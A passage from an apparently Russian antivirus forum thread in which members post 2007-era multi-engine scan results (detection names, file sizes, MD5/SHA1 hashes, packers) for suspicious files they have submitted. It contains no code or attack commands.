eSafe	7.0.15.0	2007.09.19	Suspicious Trojan/Worm*
eTrust-Vet	31.2.5154	2007.09.21	-
Ewido	4.0	2007.09.20	-
FileAdvisor	1	2007.09.23	-
Fortinet	3.11.0.0	2007.09.23	-
F-Prot	4.3.2.48	2007.09.23	-
F-Secure	6.70.13030.0	2007.09.21	-
*Ikarus	T3.1.1.12	2007.09.23	Virus.Win32.LdPinch.AQU*
Kaspersky	4.0.2.24	2007.09.23	-
McAfee	5125	2007.09.21	-
Microsoft	1.2803	2007.09.23	-
NOD32v2	2545	2007.09.23	-
Norman	5.80.02	2007.09.21	-
*Panda	9.0.0.4	2007.09.23	Adware/Adsmart*
Prevx1	V2	2007.09.23	-
Rising	19.41.62.00	2007.09.23	-
Sophos	4.21.0	2007.09.23	-
Sunbelt	2.2.907.0	2007.09.22	-
*Symantec	10	2007.09.23	Backdoor.Trojan*
TheHacker	6.2.5.066	2007.09.22	-
VBA32	3.12.2.4	2007.09.23	-
VirusBuster	4.3.26:9	2007.09.23	-
*Webwasher-Gateway	6.0.1	2007.09.21	Trojan.Delphi.Gen*

Дополнительная информация
File size: 56832 bytes
MD5: 072ed79719d1e926f46dc05a3d3ed9f7
SHA1: ab31972f5804f52fb96b50d1865c35fe2aea035c

----------


## V_Bond

nusrmgr.exe из темы  ...
http://virusinfo.info/showthread.php...382#post137382
AhnLab-V3	2007.9.22.0	2007.09.21	-
*AntiVir	7.6.0.15	2007.09.24	TR/Crypt.FKM.Gen*
Authentium	4.93.8	2007.09.23	-
Avast	4.7.1043.0	2007.09.24	-
AVG	7.5.0.485	2007.09.24	-
BitDefender	7.2	2007.09.24	-
CAT-QuickHeal	9.00	2007.09.24	-
ClamAV	0.91.2	2007.09.24	-
DrWeb	4.33	2007.09.24	-
*eSafe	7.0.15.0	2007.09.23	Win32.Trojan*
eTrust-Vet	31.2.5159	2007.09.24	-
Ewido	4.0	2007.09.20	-
FileAdvisor	1	2007.09.24	-
Fortinet	3.11.0.0	2007.09.24	-
F-Prot	4.3.2.48	2007.09.23	-
F-Secure	6.70.13030.0	2007.09.24	-
Ikarus	T3.1.1.12	2007.09.24	-
Kaspersky	4.0.2.24	2007.09.24	-
McAfee	5125	2007.09.21	-
Microsoft	1.2803	2007.09.24	-
NOD32v2	2546	2007.09.24	-
Norman	5.80.02	2007.09.24	-
Panda	9.0.0.4	2007.09.24	-
*Prevx1	V2	2007.09.24	Trojan.SystemPoser*
Rising	19.42.02.00	2007.09.24	-
Sophos	4.21.0	2007.09.24	-
Sunbelt	2.2.907.0	2007.09.24	-
*Symantec	10	2007.09.24	Trojan Horse*
TheHacker	6.2.5.067	2007.09.24	-
*VBA32	3.12.2.4	2007.09.23	suspected of Trojan-Downloader.Agent.105*
VirusBuster	4.3.26:9	2007.09.23	-
*Webwasher-Gateway	6.0.1	2007.09.24	Trojan.Crypt.FKM.Gen*
Дополнительная информация
File size: 134151 bytes
MD5: 222c3ce6ffdc4e3932ec329b2fdbcfdd
SHA1: 21199c81106b77c2c6de457d29634508f73f7dd3
packers: UPX
packers: UPX
packers: UPX

----------


## drongo

```
Файл avz00001.dta получен 2007.09.25 13:37:29 (CET)
Антивирус    Версия    Обновление    Результат
AhnLab-V3    2007.9.22.0    2007.09.24    -
AntiVir    7.6.0.15    2007.09.25    -
Authentium    4.93.8    2007.09.25    -
Avast    4.7.1043.0    2007.09.24    -
AVG    7.5.0.485    2007.09.25    BHO.BDQ
BitDefender    7.2    2007.09.25    -
CAT-QuickHeal    9.00    2007.09.24    -
ClamAV    0.91.2    2007.09.25    -
DrWeb    4.33    2007.09.25    Trojan.Click.4444
eSafe    7.0.15.0    2007.09.23    Suspicious Trojan/Worm
eTrust-Vet    31.2.5162    2007.09.25    -
Ewido    4.0    2007.09.24    -
FileAdvisor    1    2007.09.25    -
Fortinet    3.11.0.0    2007.09.25    -
F-Prot    4.3.2.48    2007.09.25    -
F-Secure    6.70.13030.0    2007.09.25    Trojan-Clicker.Win32.Delf.in
Ikarus    T3.1.1.12    2007.09.25    -
Kaspersky    4.0.2.24    2007.09.25    Trojan-Clicker.Win32.Delf.in
McAfee    5126    2007.09.24    -
Microsoft    1.2803    2007.09.25    -
NOD32v2    2549    2007.09.25    -
Norman    5.80.02    2007.09.24    W32/BHO.QG
Panda    9.0.0.4    2007.09.25    Suspicious file
Prevx1    V2    2007.09.25    -
Rising    19.42.11.00    2007.09.25    -
Sophos    4.21.0    2007.09.25    -
Sunbelt    2.2.907.0    2007.09.25    -
Symantec    10    2007.09.25    -
TheHacker    6.2.5.068    2007.09.25    -
VBA32    3.12.2.4    2007.09.25    -
VirusBuster    4.3.26:9    2007.09.24    -
Webwasher-Gateway    6.0.1    2007.09.25    Win32.Malware.gen (suspicious)
Дополнительная информация
File size: 83968 bytes
MD5: 057b2bdfbd4cf0a8903ab2dfd785bd47
SHA1: e5623a42157bbbe8dc72ec1083e3369ace07090a
packers: MORPHINE, UPX
packers: Morphine
```



```
Файл avz00002.dta получен 2007.09.25 13:46:17 (CET)
Антивирус	Версия	Обновление	Результат
AhnLab-V3	2007.9.22.0	2007.09.24	-
AntiVir	7.6.0.15	2007.09.25	-
Authentium	4.93.8	2007.09.25	-
Avast	4.7.1043.0	2007.09.24	-
AVG	7.5.0.485	2007.09.25	-
BitDefender	7.2	2007.09.25	-
CAT-QuickHeal	9.00	2007.09.24	-
ClamAV	0.91.2	2007.09.25	-
DrWeb	4.33	2007.09.25	Trojan.NtRootKit.394
eSafe	7.0.15.0	2007.09.23	-
eTrust-Vet	31.2.5162	2007.09.25	-
Ewido	4.0	2007.09.24	-
FileAdvisor	1	2007.09.25	-
Fortinet	3.11.0.0	2007.09.25	-
F-Prot	4.3.2.48	2007.09.25	-
F-Secure	6.70.13030.0	2007.09.25	Rootkit.Win32.Agent.iy
Ikarus	T3.1.1.12	2007.09.25	Rootkit.Win32.Agent.iy
Kaspersky	4.0.2.24	2007.09.25	Rootkit.Win32.Agent.iy
McAfee	5126	2007.09.24	-
Microsoft	1.2803	2007.09.25	-
NOD32v2	2549	2007.09.25	-
Norman	5.80.02	2007.09.24	-
Panda	9.0.0.4	2007.09.25	-
Prevx1	V2	2007.09.25	-
Rising	19.42.11.00	2007.09.25	-
Sophos	4.21.0	2007.09.25	-
Sunbelt	2.2.907.0	2007.09.25	-
Symantec	10	2007.09.25	-
TheHacker	6.2.5.068	2007.09.25	-
VBA32	3.12.2.4	2007.09.25	-
VirusBuster	4.3.26:9	2007.09.24	-
Webwasher-Gateway	6.0.1	2007.09.25	-
Дополнительная информация
File size: 17408 bytes
MD5: a7f6558fd1b821da244688dd515eebcb
SHA1: 57ac06799991ab0f0df2a509e37bd4a86c074dbc
```

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## HATTIFNATTOR

Антивирус Версия Обновление Результат 
AhnLab-V3 2007.9.22.0 2007.09.24 - 
AntiVir 7.6.0.15 2007.09.26 - 
Authentium 4.93.8 2007.09.25 - 
Avast 4.7.1043.0 2007.09.26 - 
AVG 7.5.0.485 2007.09.25 - 
BitDefender 7.2 2007.09.26 - 
CAT-QuickHeal 9.00 2007.09.24 - 
ClamAV 0.91.2 2007.09.26 *Trojan.Downloader.JS.Zapchast.B* 
DrWeb 4.33 2007.09.26 - 
eSafe 7.0.15.0 2007.09.23 - 
eTrust-Vet 31.2.5164 2007.09.25 - 
Ewido 4.0 2007.09.25 - 
FileAdvisor 1 2007.09.26 - 
Fortinet 3.11.0.0 2007.09.26 - 
F-Prot 4.3.2.48 2007.09.25 - 
F-Secure 6.70.13030.0 2007.09.26 *Trojan-Downloader.JS.Zapchast.b* 
Ikarus T3.1.1.12 2007.09.26 - 
Kaspersky 4.0.2.24 2007.09.26 *Trojan-Downloader.JS.Zapchast.b* 
McAfee 5127 2007.09.25 - 
Microsoft 1.2803 2007.09.26 - 
NOD32v2 2551 2007.09.26 - 
Norman 5.80.02 2007.09.25 - 
Panda 9.0.0.4 2007.09.26 - 
Prevx1 V2 2007.09.26 - 
Rising 19.42.22.00 2007.09.26 - 
Sophos 4.21.0 2007.09.26 - 
Sunbelt 2.2.907.0 2007.09.26 - 
Symantec 10 2007.09.26 - 
TheHacker 6.2.6.070 2007.09.26 - 
VBA32 3.12.2.4 2007.09.26 - 
VirusBuster 4.3.26:9 2007.09.25 - 
Webwasher-Gateway 6.0.1 2007.09.26 - 
Дополнительная информация 
File size: 1226 bytes 
MD5: f2f238f97f9e3939917827671f4f3a35 
SHA1: f95f70d6c86931aed8b93ced7e61bc38641e802f 




Антивирус Версия Обновление Результат 
AhnLab-V3 2007.9.22.0 2007.09.24 - 
AntiVir 7.6.0.15 2007.09.26 - 
Authentium 4.93.8 2007.09.25 - 
Avast 4.7.1043.0 2007.09.26 - 
AVG 7.5.0.485 2007.09.25 *JS/Psyme* 
BitDefender 7.2 2007.09.26 *Trojan.Js.Downloader.BDS* 
CAT-QuickHeal 9.00 2007.09.24 - 
ClamAV 0.91.2 2007.09.26 *JS.XorCrypt* 
DrWeb 4.33 2007.09.26 *VBS.Psyme.434* 
eSafe 7.0.15.0 2007.09.23 *JS.MS06-006* 
eTrust-Vet 31.2.5164 2007.09.25 - 
Ewido 4.0 2007.09.25 - 
FileAdvisor 1 2007.09.26 - 
Fortinet 3.11.0.0 2007.09.26 - 
F-Prot 4.3.2.48 2007.09.25 - 
F-Secure 6.70.13030.0 2007.09.26 - 
Ikarus T3.1.1.12 2007.09.26 *Trojan-Downloader.JS.Agent.kd* 
Kaspersky 4.0.2.24 2007.09.26 - 
McAfee 5127 2007.09.25 *JS/Downloader-BCZ* 
Microsoft 1.2803 2007.09.26 - 
NOD32v2 2551 2007.09.26 - 
Norman 5.80.02 2007.09.25 - 
Panda 9.0.0.4 2007.09.26 - 
Prevx1 V2 2007.09.26 - 
Rising 19.42.22.00 2007.09.26 - 
Sophos 4.21.0 2007.09.26 *Troj/JSXor-Gen* 
Sunbelt 2.2.907.0 2007.09.26 - 
Symantec 10 2007.09.26 *Downloader* 
TheHacker 6.2.6.070 2007.09.26 - 
VBA32 3.12.2.4 2007.09.26 - 
VirusBuster 4.3.26:9 2007.09.25 - 
Webwasher-Gateway 6.0.1 2007.09.26 - 
Дополнительная информация 
File size: 28711 bytes 
MD5: 7883e4e8cf6466445a989ebc33429faa 
SHA1: bf2581c276c378f2ec18711f800ad8874f6fbe88

----------


## TANUKI

> Файл moonlander.exe получен 2007.09.22 09:55:12 (CET)


Спасибо за ссылку в личку :Wink:  Сообщил тех-суппорту Яндекса об этом сайте - поблагодарили за сотрудничество и сайт этого пЫонЭра тут же прикрыли  :Wink:

----------


## drongo

```
Файл avz00005.dta получен 2007.09.26 14:04:45 (CET)
Антивирус	Версия	Обновление	Результат
AhnLab-V3	2007.9.22.0	2007.09.24	-
AntiVir	7.6.0.15	2007.09.26	-
Authentium	4.93.8	2007.09.26	W32/Backdoor.BVAA
Avast	4.7.1043.0	2007.09.26	-
AVG	7.5.0.485	2007.09.25	-
BitDefender	7.2	2007.09.26	-
CAT-QuickHeal	9.00	2007.09.24	-
ClamAV	0.91.2	2007.09.26	-
DrWeb	4.33	2007.09.26	-
eSafe	7.0.15.0	2007.09.23	-
eTrust-Vet	31.2.5165	2007.09.26	-
Ewido	4.0	2007.09.25	-
FileAdvisor	1	2007.09.26	-
Fortinet	3.11.0.0	2007.09.26	-
F-Prot	4.3.2.48	2007.09.26	W32/Backdoor.BVAA
F-Secure	6.70.13030.0	2007.09.26	-
Ikarus	T3.1.1.12	2007.09.26	-
Kaspersky	4.0.2.24	2007.09.26	-
McAfee	5127	2007.09.25	-
Microsoft	1.2803	2007.09.26	-
NOD32v2	2551	2007.09.26	-
Norman	5.80.02	2007.09.26	-
Panda	9.0.0.4	2007.09.26	-
Prevx1	V2	2007.09.26	-
Rising	19.42.22.00	2007.09.26	-
Sophos	4.21.0	2007.09.26	-
Sunbelt	2.2.907.0	2007.09.26	-
Symantec	10	2007.09.26	-
TheHacker	6.2.6.070	2007.09.26	-
VBA32	3.12.2.4	2007.09.25	-
VirusBuster	4.3.26:9	2007.09.25	-
Webwasher-Gateway	6.0.1	2007.09.26	-
Дополнительная информация
File size: 69632 bytes
MD5: 29657d950b9c71203edcbdeaa0b8d03b
SHA1: 83b08cec7ab50ab1a018ca21654ec63d90c8553b
```

----------


## vaber

```
Файл d.exe получен 2007.09.26 14:41:22 (CET)

Антивирус  	Версия  	Обновление  	Результат
AhnLab-V3	2007.9.22.0	2007.09.24	-
AntiVir	7.6.0.15	2007.09.26	-
Authentium	4.93.8	2007.09.26	-
Avast	4.7.1043.0	2007.09.26	-
AVG	7.5.0.485	2007.09.25	-
BitDefender	7.2	2007.09.26	-
CAT-QuickHeal	9.00	2007.09.24	-
ClamAV	0.91.2	2007.09.26	-
DrWeb	4.33	2007.09.26	-
eSafe	7.0.15.0	2007.09.23	suspicious Trojan/Worm
eTrust-Vet	31.2.5165	2007.09.26	-
Ewido	4.0	2007.09.25	-
FileAdvisor	1	2007.09.26	-
Fortinet	3.11.0.0	2007.09.26	-
F-Prot	4.3.2.48	2007.09.26	-
F-Secure	6.70.13030.0	2007.09.26	-
Ikarus	T3.1.1.12	2007.09.26	-
Kaspersky	4.0.2.24	2007.09.26	-
McAfee	5127	2007.09.25	-
Microsoft	1.2803	2007.09.26	-
NOD32v2	2551	2007.09.26	-
Norman	5.80.02	2007.09.26	-
Panda	9.0.0.4	2007.09.26	Suspicious file
Prevx1	V2	2007.09.26	Heuristic: Suspicious Browser Help Object
Rising	19.42.22.00	2007.09.26	-
Sophos	4.21.0	2007.09.26	-
Sunbelt	2.2.907.0	2007.09.26	-
Symantec	10	2007.09.26	-
TheHacker	6.2.6.070	2007.09.26	-
VBA32	3.12.2.4	2007.09.26	-
VirusBuster	4.3.26:9	2007.09.25	-
Webwasher-Gateway	6.0.1	2007.09.26	Win32.ModifiedUPX.gen!90 (suspicious)
Дополнительная информация
File size: 31744 bytes
MD5: a96b11dbbe695689530b17381e77fa26
SHA1: 298f3cd6d37b3820bfed48cab0eca5ce9b63d7bf
```



```
Файл inst209.exe получен 2007.09.23 19:25:38 (CET)

Антивирус  	Версия  	Обновление  	Результат
AhnLab-V3	2007.9.22.0	2007.09.21	-
AntiVir	7.6.0.15	2007.09.21	HEUR/Crypted
Authentium	4.93.8	2007.09.23	-
Avast	4.7.1043.0	2007.09.22	-
AVG	7.5.0.485	2007.09.23	-
BitDefender	7.2	2007.09.23	-
CAT-QuickHeal	9.00	2007.09.21	-
ClamAV	0.91.2	2007.09.23	-
DrWeb	4.33	2007.09.23	-
eSafe	7.0.15.0	2007.09.23	suspicious Trojan/Worm
eTrust-Vet	31.2.5154	2007.09.21	-
Ewido	4.0	2007.09.20	-
FileAdvisor	1	2007.09.23	-
Fortinet	3.11.0.0	2007.09.23	-
F-Prot	4.3.2.48	2007.09.23	-
F-Secure	6.70.13030.0	2007.09.21	-
Ikarus	T3.1.1.12	2007.09.23	-
Kaspersky	4.0.2.24	2007.09.23	-
McAfee	5125	2007.09.21	-
Microsoft	1.2803	2007.09.23	-
NOD32v2	2545	2007.09.23	-
Norman	5.80.02	2007.09.21	-
Panda	9.0.0.4	2007.09.23	-
Prevx1	V2	2007.09.23	-
Rising	19.41.62.00	2007.09.23	-
Sophos	4.21.0	2007.09.23	-
Sunbelt	2.2.907.0	2007.09.22	-
Symantec	10	2007.09.23	-
TheHacker	6.2.5.066	2007.09.22	-
VBA32	3.12.2.4	2007.09.23	-
VirusBuster	4.3.26:9	2007.09.23	-
Webwasher-Gateway	6.0.1	2007.09.21	Heuristic.Crypted
Дополнительная информация
File size: 115200 bytes
MD5: 957a754dfda54cca450dfff63edbbb25
SHA1: f06d43609f6dc917ed20cfc41a27f86d2ee68ef9
packers: UPX
packers: UPX
```



```
Файл installer.exe получен 2007.09.26 09:27:57 (CET)

Антивирус  	Версия  	Обновление  	Результат
AhnLab-V3	2007.9.22.0	2007.09.24	-
AntiVir	7.6.0.15	2007.09.26	-
Authentium	4.93.8	2007.09.25	-
Avast	4.7.1043.0	2007.09.26	-
AVG	7.5.0.485	2007.09.25	-
BitDefender	7.2	2007.09.26	-
CAT-QuickHeal	9.00	2007.09.24	(Suspicious) - DNAScan
ClamAV	0.91.2	2007.09.26	-
DrWeb	4.33	2007.09.26	-
eSafe	7.0.15.0	2007.09.23	Suspicious Trojan/Worm
eTrust-Vet	31.2.5164	2007.09.25	-
Ewido	4.0	2007.09.25	-
FileAdvisor	1	2007.09.26	-
Fortinet	3.11.0.0	2007.09.26	-
F-Prot	4.3.2.48	2007.09.25	-
F-Secure	6.70.13030.0	2007.09.26	W32/BHO.QG
Ikarus	T3.1.1.12	2007.09.26	-
Kaspersky	4.0.2.24	2007.09.26	-
McAfee	5127	2007.09.25	-
Microsoft	1.2803	2007.09.26	-
NOD32v2	2550	2007.09.25	-
Norman	5.80.02	2007.09.25	W32/BHO.QG
Panda	9.0.0.4	2007.09.26	-
Prevx1	V2	2007.09.26	-
Rising	19.42.21.00	2007.09.26	-
Sophos	4.21.0	2007.09.26	-
Sunbelt	2.2.907.0	2007.09.26	-
Symantec	10	2007.09.26	-
TheHacker	6.2.6.070	2007.09.26	-
VBA32	3.12.2.4	2007.09.26	-
VirusBuster	4.3.26:9	2007.09.25	-
Webwasher-Gateway	6.0.1	2007.09.26	Win32.Malware.gen!88 (suspicious)
Дополнительная информация
File size: 164864 bytes
MD5: 40a736cc1e53fcc426da16b590d56609
SHA1: e69f6cae46ead2e3d5158becf14fff54af2fef48
packers: MORPHINE
packers: Morphine
```



```
Файл ldr.exe получен 2007.09.26 14:41:41 (CET)

Антивирус  	Версия  	Обновление  	Результат
AhnLab-V3	2007.9.22.0	2007.09.24	-
AntiVir	7.6.0.15	2007.09.26	-
Authentium	4.93.8	2007.09.26	-
Avast	4.7.1043.0	2007.09.26	-
AVG	7.5.0.485	2007.09.25	-
BitDefender	7.2	2007.09.26	-
CAT-QuickHeal	9.00	2007.09.24	(Suspicious) - DNAScan
ClamAV	0.91.2	2007.09.26	-
DrWeb	4.33	2007.09.26	-
eSafe	7.0.15.0	2007.09.23	Suspicious Trojan/Worm
eTrust-Vet	31.2.5165	2007.09.26	-
Ewido	4.0	2007.09.25	-
FileAdvisor	1	2007.09.26	-
Fortinet	3.11.0.0	2007.09.26	W32/Agent.BRW!tr
F-Prot	4.3.2.48	2007.09.26	-
F-Secure	6.70.13030.0	2007.09.26	Bancos.gen3
Ikarus	T3.1.1.12	2007.09.26	-
Kaspersky	4.0.2.24	2007.09.26	-
McAfee	5127	2007.09.25	-
Microsoft	1.2803	2007.09.26	-
NOD32v2	2551	2007.09.26	-
Norman	5.80.02	2007.09.26	Bancos.gen3
Panda	9.0.0.4	2007.09.26	Suspicious file
Prevx1	V2	2007.09.26	-
Rising	19.42.22.00	2007.09.26	-
Sophos	4.21.0	2007.09.26	-
Sunbelt	2.2.907.0	2007.09.26	VIPRE.Suspicious
TheHacker	6.2.6.070	2007.09.26	-
VBA32	3.12.2.4	2007.09.26	-
VirusBuster	4.3.26:9	2007.09.25	-
Webwasher-Gateway	6.0.1	2007.09.26	-
Дополнительная информация
File size: 42496 bytes
MD5: d9dcd8ef5377bfdf69f66a045737f57f
SHA1: 9c1736a14cf2976f7d86389c465689f70e09497c
```



```
Файл xueta.exe получен 2007.09.19 10:25:55 (CET)

Антивирус  	Версия  	Обновление  	Результат
AhnLab-V3	2007.9.19.0	2007.09.19	-
AntiVir	7.6.0.10	2007.09.19	-
Authentium	4.93.8	2007.09.18	-
Avast	4.7.1043.0	2007.09.18	-
AVG	7.5.0.485	2007.09.18	-
BitDefender	7.2	2007.09.19	-
CAT-QuickHeal	9.00	2007.09.18	-
ClamAV	0.91.2	2007.09.19	-
DrWeb	4.33	2007.09.19	-
eSafe	7.0.15.0	2007.09.17	-
eTrust-Vet	31.2.5147	2007.09.19	-
Ewido	4.0	2007.09.18	-
FileAdvisor	1	2007.09.19	-
Fortinet	3.11.0.0	2007.09.19	-
F-Prot	4.3.2.48	2007.09.18	-
F-Secure	6.70.13030.0	2007.09.19	-
Ikarus	T3.1.1.12	2007.09.19	Virus.Win32.LdPinch.AQU
Kaspersky	4.0.2.24	2007.09.19	-
McAfee	5122	2007.09.18	-
Microsoft	1.2803	2007.09.19	-
NOD32v2	2540	2007.09.19	-
Norman	5.80.02	2007.09.18	-
Panda	9.0.0.4	2007.09.19	Suspicious file
Prevx1	V2	2007.09.19	-
Rising	19.41.20.00	2007.09.19	-
Sophos	4.21.0	2007.09.19	-
Sunbelt	2.2.907.0	2007.09.15	-
Symantec	10	2007.09.19	-
TheHacker	6.2.5.062	2007.09.19	-
VBA32	3.12.2.4	2007.09.19	-
VirusBuster	4.3.26:9	2007.09.18	-
Webwasher-Gateway	6.0.1	2007.09.19	-
Дополнительная информация
File size: 26624 bytes
MD5: b7d0500b4009a2c0b8522e8ed3a8f3d3
SHA1: 408947feb60eb59ea3fddbc74765664c1e5184e9
```

Это - массовый детект  :Smiley:

----------


## PavelA

Ребята! Давайте не отступать от правил. Выделять детекты *жирным*.

*Добавлено через 4 часа 59 минут*

Из темы 12636 (посл.карантин)
Файл *mchInjDrv.sys* - драйвер от Comodo firewall

Антивирус	Версия	Обновление	Результат
AhnLab-V3	2007.9.27.0	2007.09.27	-
AntiVir	7.6.0.15	2007.09.27	-
Authentium	4.93.8	2007.09.27	-
Avast	4.7.1043.0	2007.09.26	-
AVG	7.5.0.488	2007.09.26	-
BitDefender	7.2	2007.09.27	-
CAT-QuickHeal	9.00	2007.09.26	-
ClamAV	0.91.2	2007.09.26	-
DrWeb	4.33	2007.09.27	-
eSafe	7.0.15.0	2007.09.23	-
eTrust-Vet	31.2.5168	2007.09.27	-
Ewido	4.0	2007.09.27	-
FileAdvisor	1	2007.09.27	-
Fortinet	3.11.0.0	2007.09.27	-
F-Prot	4.3.2.48	2007.09.26	-
F-Secure	6.70.13030.0	2007.09.27	-
Ikarus	T3.1.1.12	2007.09.27	-
Kaspersky	7.0.0.125	2007.09.27	-
McAfee	5128	2007.09.26	-
Microsoft	1.2803	2007.09.27	-
NOD32v2	2554	2007.09.26	-
Norman	5.80.02	2007.09.27	-
Panda	9.0.0.4	2007.09.27	-
Prevx1	V2	2007.09.27	-
Rising	19.42.32.00	2007.09.27	-
Sophos	4.21.0	2007.09.27	-
*Sunbelt	2.2.907.0	2007.09.26	MiniKey Log*
Symantec	10	2007.09.27	-
*TheHacker	6.2.6.072	2007.09.27	Trojan/Agent.go*
*VBA32	3.12.2.4	2007.09.26	Rootkit.Win32.Agent.go*
VirusBuster	4.3.26:9	2007.09.26	-
Webwasher-Gateway	6.0.1	2007.09.27	-

Дополнительная информация
File size: 2560 bytes
MD5: 9971aa2d16cb558358d6f6f3b5055cba
SHA1: 288c6072be03ee6bc957126f14bb9bde0d199081
Sunbelt info: MiniKey Log enables logging of activities on your PC unnoticed

----------


## drongo

```
Антивирус	Версия	Обновление	Результат
AhnLab-V3	2007.9.28.0	2007.09.27	-
AntiVir	7.6.0.15	2007.09.27	-
Authentium	4.93.8	2007.09.27	-
Avast	4.7.1043.0	2007.09.26	-
AVG	7.5.0.488	2007.09.27	-
BitDefender	7.2	2007.09.27	GenPack:Adware.WebBuying.N
CAT-QuickHeal	9.00	2007.09.27	-
ClamAV	0.91.2	2007.09.26	-
DrWeb	4.33	2007.09.27	-
eSafe	7.0.15.0	2007.09.23	-
eTrust-Vet	31.2.5168	2007.09.27	-
Ewido	4.0	2007.09.27	-
FileAdvisor	1	2007.09.27	-
Fortinet	3.11.0.0	2007.09.27	-
F-Prot	4.3.2.48	2007.09.26	-
F-Secure	6.70.13030.0	2007.09.27	-
Ikarus	T3.1.1.12	2007.09.27	-
Kaspersky	7.0.0.125	2007.09.27	-
McAfee	5128	2007.09.26	-
Microsoft	1.2803	2007.09.27	-
NOD32v2	2554	2007.09.26	-
Norman	5.80.02	2007.09.27	-
Panda	9.0.0.4	2007.09.27	Suspicious file
Prevx1	V2	2007.09.27	-
Rising	19.42.32.00	2007.09.27	-
Sophos	4.21.0	2007.09.27	-
Sunbelt	2.2.907.0	2007.09.26	Web Buying
Symantec	10	2007.09.27	Adware.Webbuy
TheHacker	6.2.6.072	2007.09.27	-
VBA32	3.12.2.4	2007.09.26	-
VirusBuster	4.3.26:9	2007.09.27	-
Webwasher-Gateway	6.0.1	2007.09.27	Virus.Win32.FileInfector.gen!94 (suspicious)
Дополнительная информация
File size: 171520 bytes
MD5: a5d4209c9c0712171d2a5da4a429c4bc
SHA1: 2887cdd4999e2782b61dee11d71e09d74c29d3e1
```

----------


## TANUKI

Файл avz00002.dta получен 2007.09.27 20:19:17 (CET)

Антивирус 	Версия 	Обновление 	Результат
AhnLab-V3	2007.9.28.0	2007.09.27	-
*AntiVir	7.6.0.15	2007.09.27	TR/Rootkit.Gen*
Authentium	4.93.8	2007.09.27	-
*Avast	4.7.1043.0	2007.09.26	Win32:Agent-KYE
AVG	7.5.0.488	2007.09.27	BackDoor.Generic8.IYA*
BitDefender	7.2	2007.09.27	-
CAT-QuickHeal	9.00	2007.09.27	-
*ClamAV	0.91.2	2007.09.27	Trojan.Downloader-13660*
DrWeb	4.33	2007.09.27	-
eSafe	7.0.15.0	2007.09.23	-
eTrust-Vet	31.2.5169	2007.09.27	-
Ewido	4.0	2007.09.27	-
FileAdvisor	1	2007.09.27	-
Fortinet	3.11.0.0	2007.09.27	-
F-Prot	4.3.2.48	2007.09.27	-
*F-Secure	6.70.13030.0	2007.09.27	Trojan-Downloader.Win32.Agent.dfc*
*Ikarus	T3.1.1.12	2007.09.27	Trojan-Downloader.Win32.Agent.bbb*
*Kaspersky	7.0.0.125	2007.09.27	Trojan-Downloader.Win32.Agent.dfc
McAfee	5129	2007.09.27	BackDoor-CVM!sys*
Microsoft	1.2803	2007.09.27	-
*NOD32v2	2554	2007.09.26	probably a variant of Win32/TrojanDownloader.Agent.NPO
Norman	5.80.02	2007.09.27	Rootkit.gen4*
Panda	9.0.0.4	2007.09.27	-
Prevx1	V2	2007.09.27	-
Rising	19.42.32.00	2007.09.27	-
Sophos	4.21.0	2007.09.27	-
Sunbelt	2.2.907.0	2007.09.26	-
*Symantec	10	2007.09.27	Trojan.Farfli*
TheHacker	6.2.6.072	2007.09.27	-
VBA32	3.12.2.4	2007.09.26	-
*VirusBuster	4.3.26:9	2007.09.27	Rootkit.QQHelp.Gen.5
Webwasher-Gateway	6.0.1	2007.09.27	Trojan.Rootkit.Gen*
Дополнительная информация
File size: 35136 bytes
MD5: 0efe1876eef858de0ff4a1b738de242b
SHA1: ce88e8978e9a27f5aeb0784adae98a5aa2b0664a

*Добавлено через 18 минут*

Файл avz00004.dta получен 2007.09.27 20:19:45 (CET)

Результат: 5/32 (15.63%)

Антивирус 	Версия 	Обновление 	Результат
AhnLab-V3	2007.9.28.0	2007.09.27	-
AntiVir	7.6.0.15	2007.09.27	-
Authentium	4.93.8	2007.09.27	-
Avast	4.7.1043.0	2007.09.26	-
AVG	7.5.0.488	2007.09.27	-
BitDefender	7.2	2007.09.27	-
CAT-QuickHeal	9.00	2007.09.27	-
ClamAV	0.91.2	2007.09.27	-
DrWeb	4.33	2007.09.27	-
eSafe	7.0.15.0	2007.09.23	-
eTrust-Vet	31.2.5169	2007.09.27	-
Ewido	4.0	2007.09.27	-
FileAdvisor	1	2007.09.27	-
*Fortinet	3.11.0.0	2007.09.27	W32/Qhost.OS!tr*
F-Prot	4.3.2.48	2007.09.27	-
*F-Secure	6.70.13030.0	2007.09.27	Trojan.Win32.Qhost.os*
Ikarus	T3.1.1.12	2007.09.27	-
*Kaspersky	7.0.0.125	2007.09.27	Trojan.Win32.Qhost.os*
McAfee	5129	2007.09.27	-
Microsoft	1.2803	2007.09.27	-
NOD32v2	2554	2007.09.26	-
Norman	5.80.02	2007.09.27	-
Panda	9.0.0.4	2007.09.27	-
*Prevx1	V2	2007.09.27	TROJAN.AGENT.GEN*
Rising	19.42.32.00	2007.09.27	-
Sophos	4.21.0	2007.09.27	-
Sunbelt	2.2.907.0	2007.09.26	-
*Symantec	10	2007.09.27	Adware.Rugo*
TheHacker	6.2.6.072	2007.09.27	-
VBA32	3.12.2.4	2007.09.26	-
VirusBuster	4.3.26:9	2007.09.27	-
Webwasher-Gateway	6.0.1	2007.09.27	-
Дополнительная информация
File size: 118784 bytes
MD5: 8818f8257087de58761f802d74d6b4b4
SHA1: 64acb372bd127de20fa55683aa5ac466708329e3

----------


## mayas

Antivirus 	Version 	Last Update 	Result


```
AhnLab-V3	2007.9.29.0	2007.09.28	-
AntiVir	7.6.0.18	2007.09.28	HEUR/Crypted
Authentium	4.93.8	2007.09.29	Possibly a new variant of W32/Backdoor-based
Avast	4.7.1043.0	2007.09.29	Win32:LdPinch-NO
AVG	7.5.0.488	2007.09.30	-
BitDefender	7.2	2007.09.30	MemScan:Trojan.PWS.LdPinch.BSJ
CAT-QuickHeal	9.00	2007.09.29	(Suspicious) - DNAScan
ClamAV	0.91.2	2007.09.30	-
DrWeb	4.33	2007.09.29	-
eSafe	7.0.15.0	2007.09.29	Suspicious Trojan/Worm
eTrust-Vet	31.2.5169	2007.09.27	-
Ewido	4.0	2007.09.29	-
FileAdvisor	1	2007.09.30	-
Fortinet	3.11.0.0	2007.09.30	-
F-Prot	4.3.2.48	2007.09.29	-
F-Secure	6.70.13030.0	2007.09.29	-
Ikarus	T3.1.1.12	2007.09.30	Backdoor.Win32.Hupigon.aco
Kaspersky	7.0.0.125	2007.09.30	Heur.Trojan.Generic
McAfee	5130	2007.09.28	-
Microsoft	1.2803	2007.09.30	-
